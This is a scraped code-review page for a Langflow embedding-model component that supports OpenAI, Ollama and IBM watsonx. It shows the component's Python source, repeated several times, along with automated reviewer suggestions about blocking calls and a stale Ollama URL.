"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"
},
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🛠️ Refactor suggestion | 🟠 Major

Avoid blocking calls and duplicate fetches when listing IBM models.

fetch_ibm_models uses synchronous requests inside async update_build_config and is invoked twice for the same value. Offload to a thread and fetch once to prevent event‑loop stalls and redundant I/O.

Apply this minimal change inside the EmbeddingModelComponent code block:

+import asyncio
@@
-            elif field_value == "IBM watsonx.ai":
-                build_config["model"]["options"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)
-                build_config["model"]["value"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]
+            elif field_value == "IBM watsonx.ai":
+                models = await asyncio.to_thread(self.fetch_ibm_models, base_url=self.base_url_ibm_watsonx)
+                build_config["model"]["options"] = models
+                build_config["model"]["value"] = (models[0] if models else "")
@@
-        elif field_name == "base_url_ibm_watsonx":
-            build_config["model"]["options"] = self.fetch_ibm_models(base_url=field_value)
-            build_config["model"]["value"] = self.fetch_ibm_models(base_url=field_value)[0]
+        elif field_name == "base_url_ibm_watsonx":
+            models = await asyncio.to_thread(self.fetch_ibm_models, base_url=field_value)
+            build_config["model"]["options"] = models
+            build_config["model"]["value"] = (models[0] if models else "")

Committable suggestion skipped: line range outside the PR's diff.

🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, fetch_ibm_models is synchronous and called twice in
update_build_config causing event-loop blocking and duplicate I/O; change
update_build_config to offload the synchronous fetch to a thread via
asyncio.to_thread (or asyncio.get_running_loop().run_in_executor) and call it
only once per branch, e.g. await asyncio.to_thread(self.fetch_ibm_models,
base_url=value) store the returned list in a variable, then set
build_config["model"]["options"] = models and build_config["model"]["value"] =
models[0] if models else "" instead of calling fetch_ibm_models twice; add an
import for asyncio at top if missing.

⚠️ Potential issue | 🟠 Major

Fix: use the updated value in Ollama base URL refresh.

The ollama_base_url handler ignores field_value, risking stale model lists.

Apply:

-        elif field_name == "ollama_base_url":
+        elif field_name == "ollama_base_url":
@@
-            ollama_url = self.ollama_base_url
+            ollama_url = field_value or self.ollama_base_url
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) -> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"
},
"value": "from typing import Any\n\nimport requests\nfrom ibm_watsonx_ai.metanames import EmbedTextParamsMetaNames\nfrom langchain_openai import OpenAIEmbeddings\n\nfrom lfx.base.embeddings.model import LCEmbeddingsModel\nfrom lfx.base.models.model_utils import get_ollama_models, is_valid_ollama_url\nfrom lfx.base.models.openai_constants import OPENAI_EMBEDDING_MODEL_NAMES\nfrom lfx.base.models.watsonx_constants import (\n IBM_WATSONX_URLS,\n WATSONX_EMBEDDING_MODEL_NAMES,\n)\nfrom lfx.field_typing import Embeddings\nfrom lfx.io import (\n BoolInput,\n DictInput,\n DropdownInput,\n FloatInput,\n IntInput,\n MessageTextInput,\n SecretStrInput,\n)\nfrom lfx.log.logger import logger\nfrom lfx.schema.dotdict import dotdict\nfrom lfx.utils.util import transform_localhost_url\n\n# Ollama API constants\nHTTP_STATUS_OK = 200\nJSON_MODELS_KEY = \"models\"\nJSON_NAME_KEY = \"name\"\nJSON_CAPABILITIES_KEY = \"capabilities\"\nDESIRED_CAPABILITY = \"embedding\"\nDEFAULT_OLLAMA_URL = \"http://localhost:11434\"\n\n\nclass EmbeddingModelComponent(LCEmbeddingsModel):\n display_name = \"Embedding Model\"\n description = \"Generate embeddings using a specified provider.\"\n documentation: str = \"https://docs.langflow.org/components-embedding-models\"\n icon = \"binary\"\n name = \"EmbeddingModel\"\n category = \"models\"\n\n inputs = [\n DropdownInput(\n name=\"provider\",\n display_name=\"Model Provider\",\n options=[\"OpenAI\", \"Ollama\", \"IBM watsonx.ai\"],\n value=\"OpenAI\",\n info=\"Select the embedding model provider\",\n real_time_refresh=True,\n options_metadata=[{\"icon\": \"OpenAI\"}, {\"icon\": \"Ollama\"}, {\"icon\": \"WatsonxAI\"}],\n ),\n MessageTextInput(\n name=\"api_base\",\n display_name=\"API Base URL\",\n info=\"Base URL for the API. Leave empty for default.\",\n advanced=True,\n ),\n MessageTextInput(\n name=\"ollama_base_url\",\n display_name=\"Ollama API URL\",\n info=f\"Endpoint of the Ollama API (Ollama only). Defaults to {DEFAULT_OLLAMA_URL}\",\n value=DEFAULT_OLLAMA_URL,\n show=False,\n real_time_refresh=True,\n load_from_db=True,\n ),\n DropdownInput(\n name=\"base_url_ibm_watsonx\",\n display_name=\"watsonx API Endpoint\",\n info=\"The base URL of the API (IBM watsonx.ai only)\",\n options=IBM_WATSONX_URLS,\n value=IBM_WATSONX_URLS[0],\n show=False,\n real_time_refresh=True,\n ),\n DropdownInput(\n name=\"model\",\n display_name=\"Model Name\",\n options=OPENAI_EMBEDDING_MODEL_NAMES,\n value=OPENAI_EMBEDDING_MODEL_NAMES[0],\n info=\"Select the embedding model to use\",\n real_time_refresh=True,\n refresh_button=True,\n ),\n SecretStrInput(\n name=\"api_key\",\n display_name=\"OpenAI API Key\",\n info=\"Model Provider API key\",\n required=True,\n show=True,\n real_time_refresh=True,\n ),\n # Watson-specific inputs\n MessageTextInput(\n name=\"project_id\",\n display_name=\"Project ID\",\n info=\"IBM watsonx.ai Project ID (required for IBM watsonx.ai)\",\n show=False,\n ),\n IntInput(\n name=\"dimensions\",\n display_name=\"Dimensions\",\n info=\"The number of dimensions the resulting output embeddings should have. \"\n \"Only supported by certain models.\",\n advanced=True,\n ),\n IntInput(name=\"chunk_size\", display_name=\"Chunk Size\", advanced=True, value=1000),\n FloatInput(name=\"request_timeout\", display_name=\"Request Timeout\", advanced=True),\n IntInput(name=\"max_retries\", display_name=\"Max Retries\", advanced=True, value=3),\n BoolInput(name=\"show_progress_bar\", display_name=\"Show Progress Bar\", advanced=True),\n DictInput(\n name=\"model_kwargs\",\n display_name=\"Model Kwargs\",\n advanced=True,\n info=\"Additional keyword arguments to pass to the model.\",\n ),\n IntInput(\n name=\"truncate_input_tokens\",\n display_name=\"Truncate Input Tokens\",\n advanced=True,\n value=200,\n show=False,\n ),\n BoolInput(\n name=\"input_text\",\n display_name=\"Include the original text in the output\",\n value=True,\n advanced=True,\n show=False,\n ),\n ]\n\n @staticmethod\n def fetch_ibm_models(base_url: str) 